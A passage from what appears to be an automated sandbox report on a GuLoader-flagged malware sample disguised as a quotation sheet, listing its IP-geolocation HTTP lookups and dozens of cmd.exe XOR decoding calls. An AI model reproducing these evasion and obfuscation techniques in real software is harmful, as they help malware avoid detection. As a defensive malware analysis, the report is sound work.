  Age: 4
  Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7VECYW7ccsqINmYIn3mxaa%2F5L5FML5VzqB9x0RLxnYzP1rpwVkv4k%2Frcq5yaE0NjO3%2Fx%2BAyU7XV9T4wzL7XUYbmfGT9lPZtbI%2B4SRabSR5U4f6nK57qTLRKCMoJh5aAovjIlede"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8a84020999955848-IAD
  alt-svc: h3=":443"; ma=86400
2024-07-24 12:45:33 UTC | 342 | IN | Data Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
  Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
2024-07-24 12:45:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID: 8
Source IP: 192.168.11.20
Source Port: 49788
Destination IP: 172.67.177.134
Destination Port: 443
PID: 5668
Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-24 12:45:33 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
  Host: reallyfreegeoip.org
2024-07-24 12:45:33 UTC | 702 | IN | HTTP/1.1 200 OK
  Date: Wed, 24 Jul 2024 12:45:33 GMT
  Content-Type: application/xml
  Transfer-Encoding: chunked
  Connection: close
  access-control-allow-origin: *
  vary: Accept-Encoding
  Cache-Control: max-age=86400
  CF-Cache-Status: HIT
  Age: 4
  Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wYvRB3I7WvGcrPByQJnny7aDoJrwOqnDpxuI3bFyPDN6KXb95Ziu75IK7J9cZlag5t4QDl%2FAuit1Vo0aJbPCb9dDfyu1R%2FsL9Ln01FvDJ2TR9A6HcfGecfyBbCQc6ntrm%2FH1bzC"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8a84020dc92b9c43-IAD
  alt-svc: h3=":443"; ma=86400
2024-07-24 12:45:33 UTC | 342 | IN | Data Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
  Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
2024-07-24 12:45:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Session ID: 9
Source IP: 192.168.11.20
Source Port: 49789
Destination IP: 172.67.177.134
Destination Port: 443
PID: 5668
Process: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-24 12:45:34 UTC | 62 | OUT | GET /xml/149.18.24.104 HTTP/1.1
  Host: reallyfreegeoip.org
2024-07-24 12:45:34 UTC | 706 | IN | HTTP/1.1 200 OK
  Date: Wed, 24 Jul 2024 12:45:34 GMT
  Content-Type: application/xml
  Transfer-Encoding: chunked
  Connection: close
  access-control-allow-origin: *
  vary: Accept-Encoding
  Cache-Control: max-age=86400
  CF-Cache-Status: HIT
  Age: 5
  Last-Modified: Wed, 24 Jul 2024 12:45:29 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4fhFOfnjN6HWexzK8kFdvIQuqGsSqOM5XiT4gticmw2N6Jy4%2B70odMt5Alp3iKSA1CNChmGuaeJ4A%2FEoERjcSxl5cK%2BUBv1qdlzSnKLZdzLxGqShCG%2BYT6%2FrJ3UnmzzaxMUGm7YP"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8a840212085f829e-IAD
  alt-svc: h3=":443"; ma=86400
2024-07-24 12:45:34 UTC | 342 | IN | Data Raw: 31 34 66 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e
  Data Ascii: 14f<Response><IP>149.18.24.104</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.
2024-07-24 12:45:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0


Target ID: 0
Start time: 08:44:39
Start date: 24/07/2024
Path: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"
Imagebase: 0x400000
File size: 1'009'096 bytes
MD5 hash: CFB41760F84E1E70BADE0CA7394D424B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "250^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 3
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "244^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 5
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "227^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "255^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "244^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 12
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "253^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 13
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 14
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "130^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 15
Start time: 08:44:40
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 16
Start time: 08:44:41
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "131^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 17
Start time: 08:44:41
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

                                                                              Target ID:18
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:19
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:20
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:21
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:22
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "242^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:23
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:24
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "195^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:25
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:26
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:27
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:28
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "208^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:29
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:30
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "197^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:31
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:32
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:33
                                                                              Start time:08:44:41
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:34
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "247^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:35
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:36
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:37
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:38
                                                                              Start time:08:44:42
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "221^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 39
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 40
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "212^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "240^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 43
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 44
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "153^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 45
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 46
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "220^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 47
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 48
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 49
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 50
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
